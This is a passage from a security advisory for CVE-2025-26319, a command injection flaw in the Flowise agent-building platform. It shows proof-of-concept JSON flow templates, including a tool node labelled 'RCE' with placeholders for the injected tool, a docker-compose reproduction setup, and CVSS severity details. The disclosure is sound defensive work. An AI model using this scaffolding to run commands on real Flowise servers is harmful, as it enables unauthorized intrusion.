ExecuteFlow\"},{\"source\":\"seqLLMNode_0\",\"sourceHandle\":\"seqLLMNode_0-output-seqLLMNode-LLMNode\",\"target\":\"seqToolNode_0\",\"targetHandle\":\"seqToolNode_0-input-llmNode-LLMNode\",\"type\":\"buttonedge\",\"id\":\"seqLLMNode_0-seqLLMNode_0-output-seqLLMNode-LLMNode-seqToolNode_0-seqToolNode_0-input-llmNode-LLMNode\"},{\"source\":\"customTool_0\",\"sourceHandle\":\"customTool_0-output-customTool-CustomTool|Tool|StructuredTool|Runnable\",\"target\":\"seqToolNode_0\",\"targetHandle\":\"seqToolNode_0-input-tools-Tool\",\"type\":\"buttonedge\",\"id\":\"customTool_0-customTool_0-output-customTool-CustomTool|Tool|StructuredTool|Runnable-seqToolNode_0-seqToolNode_0-input-tools-Tool\"}],\"viewport\":{\"x\":342.9884767763509,\"y\":-74.95245209504867,\"zoom\":0.9537965917366983}}","type":"MULTIAGENT"}
`NewAgentChat.json` 
{"name":"%s","deployed":false,"isPublic":false,"flowData":"{\"nodes\":[{\"id\":\"startAgentflow_0\",\"type\":\"agentFlow\",\"position\":{\"x\":100,\"y\":100},\"data\":{\"label\":\"Start\",\"name\":\"startAgentflow\",\"version\":1.1,\"type\":\"Start\",\"category\":\"Agent Flows\",\"description\":\"Starting point of the agentflow\",\"baseClasses\":[\"Start\"],\"color\":\"#7EE787\",\"hideInput\":true,\"inputs\":{\"startInputType\":\"chatInput\",\"formTitle\":\"\",\"formDescription\":\"\",\"formInputTypes\":\"\",\"startEphemeralMemory\":\"\",\"startState\":\"\",\"startPersistState\":\"\"},\"filePath\":\"/usr/local/lib/node_modules/flowise/node_modules/flowise-components/dist/nodes/agentflow/Start/Start.js\",\"position\":{\"x\":100,\"y\":100},\"inputAnchors\":[],\"inputParams\":[{\"label\":\"Input Type\",\"name\":\"startInputType\",\"type\":\"options\",\"options\":[{\"label\":\"Chat Input\",\"name\":\"chatInput\",\"description\":\"Start the conversation with chat input\"},{\"label\":\"Form Input\",\"name\":\"formInput\",\"description\":\"Start the workflow with form inputs\"}],\"default\":\"chatInput\",\"id\":\"startAgentflow_0-input-startInputType-options\",\"display\":true},{\"label\":\"Form Title\",\"name\":\"formTitle\",\"type\":\"string\",\"placeholder\":\"Please Fill Out The Form\",\"show\":{\"startInputType\":\"formInput\"},\"id\":\"startAgentflow_0-input-formTitle-string\",\"display\":false},{\"label\":\"Form Description\",\"name\":\"formDescription\",\"type\":\"string\",\"placeholder\":\"Complete all fields below to continue\",\"show\":{\"startInputType\":\"formInput\"},\"id\":\"startAgentflow_0-input-formDescription-string\",\"display\":false},{\"label\":\"Form Input Types\",\"name\":\"formInputTypes\",\"description\":\"Specify the type of form input\",\"type\":\"array\",\"show\":{\"startInputType\":\"formInput\"},\"array\":[{\"label\":\"Type\",\"name\":\"type\",\"type\":\"options\",\"options\":[{\"label\":\"String\",\"name\":\"string\"},{\"label\":\"Number\",\"name\":\"number\"},{\"label\":\"Boolean\",\"name\":\"boolean\"},{\"label\":\"Options\",\"name\":\"options\"}],\"default\":\"string\"},{\"label\":\"Label\",\"name\":\"label\",\"type\":\"string\",\"placeholder\":\"Label for the input\"},{\"label\":\"Variable Name\",\"name\":\"name\",\"type\":\"string\",\"placeholder\":\"Variable name for the input (must be camel case)\",\"description\":\"Variable name must be camel case. For example: firstName, lastName, etc.\"},{\"label\":\"Add Options\",\"name\":\"addOptions\",\"type\":\"array\",\"show\":{\"formInputTypes[$index].type\":\"options\"},\"array\":[{\"label\":\"Option\",\"name\":\"option\",\"type\":\"string\"}]}],\"id\":\"startAgentflow_0-input-formInputTypes-array\",\"display\":false},{\"label\":\"Ephemeral Memory\",\"name\":\"startEphemeralMemory\",\"type\":\"boolean\",\"description\":\"Start fresh for every execution without past chat history\",\"optional\":true,\"id\":\"startAgentflow_0-input-startEphemeralMemory-boolean\",\"display\":true},{\"label\":\"Flow State\",\"name\":\"startState\",\"description\":\"Runtime state during the execution of the workflow\",\"type\":\"array\",\"optional\":true,\"array\":[{\"label\":\"Key\",\"name\":\"key\",\"type\":\"string\",\"placeholder\":\"Foo\"},{\"label\":\"Value\",\"name\":\"value\",\"type\":\"string\",\"placeholder\":\"Bar\",\"optional\":true}],\"id\":\"startAgentflow_0-input-startState-array\",\"display\":true},{\"label\":\"Persist State\",\"name\":\"startPersistState\",\"type\":\"boolean\",\"description\":\"Persist the state in the same session\",\"optional\":true,\"id\":\"startAgentflow_0-input-startPersistState-boolean\",\"display\":true}],\"outputs\":{},\"outputAnchors\":[{\"id\":\"startAgentflow_0-output-startAgentflow\",\"label\":\"Start\",\"name\":\"startAgentflow\"}],\"id\":\"startAgentflow_0\",\"selected\":false},\"width\":103,\"height\":66,\"positionAbsolute\":{\"x\":100,\"y\":100}},{\"id\":\"toolAgentflow_0\",\"position\":{\"x\":240,\"y\":99.75},\"data\":{\"loadMethods\":{},\"label\":\"RCE\",\"name\":\"toolAgentflow\",\"version\":1,\"type\":\"Tool\",\"category\":\"Agent Flows\",\"description\":\"Tools allow LLM to interact with external systems\",\"baseClasses\":[\"Tool\"],\"color\":\"#d4a373\",\"inputs\":{\"selectedTool\":\"customTool\",\"toolInputArgs\":\"\",\"toolUpdateState\":\"\",\"selectedToolConfig\":{\"selectedTool\":\"%s\",\"returnDirect\":true,\"customToolName\":\"\",\"customToolDesc\":\"\",\"customToolSchema\":\"\",\"customToolFunc\":\"\"}},\"filePath\":\"/usr/local/lib/node_modules/flowise/node_modules/flowise-components/dist/nodes/agentflow/Tool/Tool.js\",\"inputAnchors\":[],\"inputParams\":[{\"label\":\"Tool\",\"name\":\"selectedTool\",\"type\":\"asyncOptions\",\"loadMethod\":\"listTools\",\"loadConfig\":true,\"id\":\"toolAgentflow_0-input-selectedTool-asyncOptions\",\"display\":true},{\"label\":\"Tool Input Arguments\",\"name\":\"toolInputArgs\",\"type\":\"array\",\"acceptVariable\":true,\"refresh\":true,\"array\":[{\"label\":\"Input Argument Name\",\"name\":\"inputArgName\",\"type\":\"asyncOptions\",\"loadMethod\":\"listToolInputArgs\",\"refresh\":true},{\"label\":\"Input Argument Value\",\"name\":\"inputArgValue\",\"type\":\"string\",\"acceptVariable\":true}],\"show\":{\"selectedTool\":\".+\"},\"id\":\"toolAgentflow_0-input-toolInputArgs-array\",\"display\":true},{\"label\":\"Update Flow State\",\"name\":\"toolUpdateState\",\"description\":\"Update runtime state during the execution of the workflow\",\"type\":\"array\",\"optional\":true,\"acceptVariable\":true,\"array\":[{\"label\":\"Key\",\"name\":\"key\",\"type\":\"asyncOptions\",\"loadMethod\":\"listRuntimeStateKeys\",\"freeSolo\":true},{\"label\":\"Value\",\"name\":\"value\",\"type\":\"string\",\"acceptVariable\":true,\"acceptNodeOutputAsVariable\":true}],\"id\":\"toolAgentflow_0-input-toolUpdateState-array\",\"display\":true}],\"outputs\":{},\"outputAnchors\":[{\"id\":\"toolAgentflow_0-output-toolAgentflow\",\"label\":\"Tool\",\"name\":\"toolAgentflow\"}],\"id\":\"toolAgentflow_0\",\"selected\":false},\"type\":\"agentFlow\",\"width\":99,\"height\":68,\"selected\":true,\"positionAbsolute\":{\"x\":240,\"y\":99.75},\"dragging\":false}],\"edges\":[{\"source\":\"startAgentflow_0\",\"sourceHandle\":\"startAgentflow_0-output-startAgentflow\",\"target\":\"toolAgentflow_0\",\"targetHandle\":\"toolAgentflow_0\",\"data\":{\"sourceColor\":\"#7EE787\",\"targetColor\":\"#d4a373\",\"isHumanInput\":false},\"type\":\"agentFlow\",\"id\":\"startAgentflow_0-startAgentflow_0-output-startAgentflow-toolAgentflow_0-toolAgentflow_0\"}],\"viewport\":{\"x\":961,\"y\":336.5,\"zoom\":2}}","type":"AGENTFLOW"}

Additionally I utilized the following docker-compose.yml file for reproduction, toggle the versions for each specific one (newer versions require a migration to new user format before usage):

version: '3.1'

services:
    flowise:
        image: flowiseai/flowise:latest
        #image: flowiseai/flowise:2.2.6
        environment:
            - PORT=3000
            - DATABASE_PATH=/root/.flowise
            - APIKEY_PATH=/root/.flowise
            - SECRETKEY_PATH=/root/.flowise
            - LOG_PATH=/root/.flowise/logs
            - BLOB_STORAGE_PATH=/root/.flowise/storage
            - FLOWISE_USERNAME=user
            - FLOWISE_PASSWORD=1234
            - CORS_ORIGINS=${CORS_ORIGINS}
            - IFRAME_ORIGINS=${IFRAME_ORIGINS}
            - FLOWISE_FILE_SIZE_LIMIT=${FLOWISE_FILE_SIZE_LIMIT}
            - DEBUG=${DEBUG}
            - DATABASE_TYPE=${DATABASE_TYPE}
            - DATABASE_PORT=${DATABASE_PORT}
            - DATABASE_HOST=${DATABASE_HOST}
            - DATABASE_NAME=${DATABASE_NAME}
            - DATABASE_USER=${DATABASE_USER}
            - DATABASE_PASSWORD=${DATABASE_PASSWORD}
            - DATABASE_SSL=${DATABASE_SSL}
            - DATABASE_SSL_KEY_BASE64=${DATABASE_SSL_KEY_BASE64}
            - APIKEY_STORAGE_TYPE=${APIKEY_STORAGE_TYPE}
            - FLOWISE_SECRETKEY_OVERWRITE=${FLOWISE_SECRETKEY_OVERWRITE}
            - LOG_LEVEL=${LOG_LEVEL}
            - DISABLE_FLOWISE_TELEMETRY=${DISABLE_FLOWISE_TELEMETRY}
            - MODEL_LIST_CONFIG_JSON=${MODEL_LIST_CONFIG_JSON}
            - GLOBAL_AGENT_HTTP_PROXY=${GLOBAL_AGENT_HTTP_PROXY}
            - GLOBAL_AGENT_HTTPS_PROXY=${GLOBAL_AGENT_HTTPS_PROXY}
            - GLOBAL_AGENT_NO_PROXY=${GLOBAL_AGENT_NO_PROXY}
            - DISABLED_NODES=${DISABLED_NODES}
            - MODE=${MODE}
            - WORKER_CONCURRENCY=${WORKER_CONCURRENCY}
            - QUEUE_NAME=${QUEUE_NAME}
            - QUEUE_REDIS_EVENT_STREAM_MAX_LEN=${QUEUE_REDIS_EVENT_STREAM_MAX_LEN}
            - REDIS_URL=${REDIS_URL}
            - REDIS_HOST=${REDIS_HOST}
            - REDIS_PORT=${REDIS_PORT}
            - REDIS_PASSWORD=${REDIS_PASSWORD}
            - REDIS_USERNAME=${REDIS_USERNAME}
            - REDIS_TLS=${REDIS_TLS}
            - REDIS_CERT=${REDIS_CERT}
            - REDIS_KEY=${REDIS_KEY}
            - REDIS_CA=${REDIS_CA}
        ports:
            - '${PORT}:${PORT}'
        volumes:
            - ./flowise-data:/root/.flowise
        entrypoint: /bin/sh -c "sleep 3; flowise start"

Impact

Authenticated users can execute system commands.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v4 base metrics

Exploitability Metrics
Attack Vector Network
Attack Complexity Low
Attack Requirements None
Privileges Required High
User interaction None
Vulnerable System Impact Metrics
Confidentiality High
Integrity Low
Availability Low
Subsequent System Impact Metrics
Confidentiality High
Integrity High
Availability Low

CVSS v4 base metrics

Exploitability Metrics
Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.
Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.
Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.
Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.
User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.
Vulnerable System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
Subsequent System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:L/SC:H/SI:H/SA:L

CVE ID

CVE-2025-26319

Weaknesses

Improper Neutralization of Special Elements used in a Command ('Command Injection')

The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Learn more on MITRE.

Credits